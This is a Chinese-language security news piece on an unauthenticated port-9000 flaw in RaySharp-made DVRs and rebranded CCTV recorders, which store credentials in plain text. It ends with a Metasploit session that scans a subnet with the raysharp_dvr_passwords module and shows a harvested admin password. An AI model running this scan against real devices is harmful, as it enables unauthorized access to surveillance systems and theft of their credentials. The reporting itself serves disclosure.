DVR漏洞使黑客輕松控制CCTV攝像機(MSF已更新模塊)
安全研究人員稱,CCTV眾多視頻錄制設(shè)備正面臨被黑風險,黑客可以監(jiān)控、復(fù)制和刪除視頻流。
安全人員補充到,除非系統(tǒng)安裝了合適的固件,否則DVR平臺固件都能成為攻擊者向這些網(wǎng)絡(luò)視頻設(shè)備進行攻擊的切入點。這些易受攻擊的CCTV設(shè)備是總部位于廣東的RaySharp公司生產(chǎn)的。
攻擊上周首先被發(fā)現(xiàn),黑客可以通過DVR 9000端口發(fā)送命令而無須任何認證,這樣黑客就可直接進入到DVR的web控制面板。更悲催的是DVR通常支持UPnP(通用即插即用,可以通過網(wǎng)絡(luò)驅(qū)動設(shè)備),網(wǎng)上就能實施控制。此外,RaySharp DVR還以明文形式存儲用戶名和密碼。
事實上,受影響的廠商還包括:Swann, Lorex, URMET, KGuard, Defender, DEAPA/DSP Cop, SVAT, Zmodo, BCS, Bolide, EyeForce, Atlantis, Protectron, Greatek, Soyo, Hi-View, Cosmos, and J2000等等。掃描顯示,全世界150多個國家超過58000視頻設(shè)備可被攻擊。
metasploit下已有了相關(guān)模塊:
$ sudo -s -E
# msfconsole
msf> use auxiliary/scanner/misc/raysharp_dvr_passwords
msf auxiliary(raysharp_dvr_passwords) > set RHOSTS 192.168.0.0/24
msf auxiliary(raysharp_dvr_passwords) > set THREADS 256
msf auxiliary(raysharp_dvr_passwords) > run
[+] 192.168.0.153:9000 (user='admin' pass='1234546') mac=00-23-63-63-63-63 version=V2.1-20110716
附:
RaySharp安聯(lián)銳視,是全球領(lǐng)先的數(shù)字視頻監(jiān)控解決方案提供商,以珠海為總部,營銷網(wǎng)絡(luò)覆蓋全球近百個國家和地區(qū)。安聯(lián)銳視在中國先后為北京天安門廣場、2008年北京奧運會場館、深圳國際會展中心、中山市政府和澳門大學(xué)橫琴校區(qū)等數(shù)百萬企事業(yè)單位、商業(yè)機構(gòu)、公共事業(yè)、政府機關(guān)和家庭社區(qū)提供數(shù)字監(jiān)控服務(wù)。